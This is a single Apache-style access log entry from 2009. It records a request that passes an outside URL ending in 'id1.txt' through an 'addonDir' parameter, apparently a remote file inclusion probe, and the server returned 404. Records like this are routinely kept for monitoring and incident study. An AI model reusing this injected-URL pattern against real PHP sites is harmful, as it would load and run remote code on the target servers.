190.97.219.4 - - [26/Nov/2009:05:33:01 -0500] "GET /logs/access_log.Q109092200/addons/guildbank/searcharrays.php?addonDir=http://creative-alchemy.com/zencart//media/id1.txt??? HTTP/1.1" 404 258 "-" "Mozilla/5.0"
